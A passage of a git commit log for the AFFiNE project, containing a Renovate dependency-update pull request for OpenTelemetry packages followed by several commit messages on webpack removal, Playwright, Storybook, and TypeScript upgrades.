[@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core))
| [`^0.57.0` →
`^0.58.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.58.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0?slim=true)
|
|
[@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io))
| [`^0.57.0` →
`^0.59.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.59.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0?slim=true)
|
|
[@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.5.0` →
`2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.5.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1?slim=true)
|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.5.0` →
`2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.5.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1?slim=true)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/exporter-prometheus)</summary>

###
[`v0.212.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/host-metrics)</summary>

###
[`v0.38.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0383-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...630937db1575c652201558467ae5c449075f0881)

##### Bug Fixes

- **instrumentation-host-metrics:** unpin and update to
systeminformation@^5.31.1
([#&#8203;3392](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3392))
([e4ffdb4](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ffdb43d160ace57420978da9c1855be653abe1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-graphql)</summary>

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0600-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **instrumentation-graphql:** add parent name in attributes of resolver
span
([#&#8203;3287](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3287))
([ea2a90a](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ea2a90a87b5b5a6d29f980a73e61cefa020ab81c))

###
[`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0590-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0600-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.58.0 to ^0.59.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0580-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0590-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **deps:** lock file maintenance
([#&#8203;3261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3261))
([540926b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/540926bffe713c591163abaf56fbb0e18aaf5b88))

###
[`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0580-2026-02-16)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@&#8203;opentelemetry/\*"
([#&#8203;3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.58.0 to ^0.59.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-01 21:19:09 +00:00
DarkSky 2cb171f553 feat: cleanup webpack deps (#14530)
#### PR Dependency Tree


* **PR #14530** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Breaking Changes**
  * Webpack bundler support removed from the build system
* Bundler selection parameter removed from build and development
commands

* **Refactor**
  * Build configuration consolidated to a single bundler approach
* Webpack-specific build paths and workflows removed; development server
simplified

* **Chores**
  * Removed webpack-related dev dependencies and tooling
  * Updated package build scripts for a unified bundle command

* **Dependencies**
* Upgraded Sentry packages across frontend packages
(react/electron/esbuild plugin)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-28 00:24:08 +08:00
DarkSky a4e2242b8d chore: bump playwright (#13947)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Updated Playwright test tooling to 1.58.2 across the repository and
test packages.

* **Tests**
* Improved end-to-end robustness: replaced fragile timing/coordinate
logic with element-based interactions, added polling/retry checks for
flaky asserts and async state, and simplified input/rename flows to
reduce test flakiness.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-27 22:56:43 +08:00
DarkSky c90f173821 chore: bump deps (#14526)
#### PR Dependency Tree


* **PR #14526** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated Storybook component development tooling to version 10.2.13 for
improved stability and performance
  * Removed Chromatic integration from the component preview system

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-27 20:17:06 +08:00
DarkSky e1e0ac2345 chore: cleanup deps (#14525)
#### PR Dependency Tree


* **PR #14525** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Removed an unused development dependency.
* Updated dotLottie/Lottie-related dependency versions across packages
and replaced a removed player dependency with the new package.

* **Refactor**
* AI animated icons now re-export from a shared component and are loaded
only in the browser, reducing upfront bundle weight and centralizing
icon assets.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-27 11:56:54 +08:00
DarkSky 046e126054 feat: bump typescript (#14507)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Upgraded TypeScript toolchain to v5.9.3 across packages and tooling.
* Removed legacy ts-node and migrated developer tooling to newer
runtimes (tsx/SWC) where applicable.
* **Documentation**
* Updated developer CLI docs and runtime behavior notes to reflect the
new loader/runtime for running TypeScript files; no changes to public
APIs or end-user behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-02-24 13:22:46 +08:00